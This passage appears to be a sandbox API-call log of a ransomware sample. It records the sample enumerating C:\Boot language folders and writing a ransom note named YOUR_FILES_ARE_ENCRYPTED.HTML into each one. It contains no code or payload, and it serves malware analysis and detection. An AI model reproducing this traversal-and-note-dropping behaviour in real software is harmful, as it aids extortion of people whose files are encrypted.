ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="da-DK", cAlternateFileName="")) returned 1 [0104.492] StrStrIW (lpFirst="da-DK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.492] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0104.492] GetProcessHeap () returned 0x600000 [0104.492] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.493] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0104.493] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*") returned="\\\\?\\C:\\Boot\\da-DK\\*" [0104.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626838 [0104.494] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.494] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.494] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.494] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0104.494] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.494] lstrlenW (lpString=".mui") returned 4 [0104.494] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.494] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.494] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.494] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\memtest.exe.mui") returned 33 [0104.494] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.494] lstrlenW (lpString=".mui") returned 4 [0104.494] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.495] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.495] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0104.495] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.495] GetProcessHeap () returned 0x600000 [0104.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.495] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\da-dk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.497] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.497] CloseHandle (hObject=0x300) returned 1 [0104.498] GetProcessHeap () returned 0x600000 [0104.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.498] GetProcessHeap () returned 0x600000 [0104.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.498] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="de-DE", cAlternateFileName="")) returned 1 [0104.499] StrStrIW (lpFirst="de-DE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.499] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0104.499] GetProcessHeap () returned 0x600000 [0104.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.499] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0104.499] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*") returned="\\\\?\\C:\\Boot\\de-DE\\*" [0104.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.500] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.500] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.500] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.500] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0104.500] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.500] lstrlenW (lpString=".mui") returned 4 [0104.500] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.500] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.500] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.500] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\memtest.exe.mui") returned 33 [0104.500] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.500] lstrlenW (lpString=".mui") returned 4 [0104.500] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.500] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.500] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.501] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.501] GetProcessHeap () returned 0x600000 [0104.501] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.501] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\de-de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.502] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.503] CloseHandle (hObject=0x300) returned 1 [0104.503] GetProcessHeap () returned 0x600000 [0104.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.503] GetProcessHeap () returned 0x600000 [0104.503] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.504] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="el-GR", cAlternateFileName="")) returned 1 [0104.504] StrStrIW (lpFirst="el-GR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.504] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0104.504] GetProcessHeap () returned 0x600000 [0104.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.505] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0104.505] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*") returned="\\\\?\\C:\\Boot\\el-GR\\*" [0104.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.505] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.506] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.506] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.506] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0104.506] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.506] lstrlenW (lpString=".mui") returned 4 [0104.506] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.506] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.506] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.506] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui") returned 33 [0104.506] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.506] lstrlenW (lpString=".mui") returned 4 [0104.506] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.506] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.506] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.506] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.506] GetProcessHeap () returned 0x600000 [0104.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\el-gr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.507] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.508] CloseHandle (hObject=0x300) returned 1 [0104.508] GetProcessHeap () returned 0x600000 [0104.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.509] GetProcessHeap () returned 0x600000 [0104.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.509] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="en-GB", cAlternateFileName="")) returned 1 [0104.509] StrStrIW (lpFirst="en-GB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.509] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-GB") returned 17 [0104.509] GetProcessHeap () returned 0x600000 [0104.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.510] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\en-GB" | out: lpString1="\\\\?\\C:\\Boot\\en-GB") returned="\\\\?\\C:\\Boot\\en-GB" [0104.510] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-GB", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\en-GB\\*") returned="\\\\?\\C:\\Boot\\en-GB\\*" [0104.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-GB\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626638 [0104.510] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.510] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.510] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.510] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 33 [0104.511] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.511] lstrlenW (lpString=".mui") returned 4 [0104.511] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.511] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.511] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0104.511] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.511] GetProcessHeap () returned 0x600000 [0104.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.511] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\en-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.511] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.512] CloseHandle (hObject=0x300) returned 1 [0104.512] GetProcessHeap () returned 0x600000 [0104.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.512] GetProcessHeap () returned 0x600000 [0104.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.513] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="en-US", cAlternateFileName="")) returned 1 [0104.513] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.513] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0104.513] GetProcessHeap () returned 0x600000 [0104.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.514] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0104.514] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*") returned="\\\\?\\C:\\Boot\\en-US\\*" [0104.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.514] FindNextFileW (in: 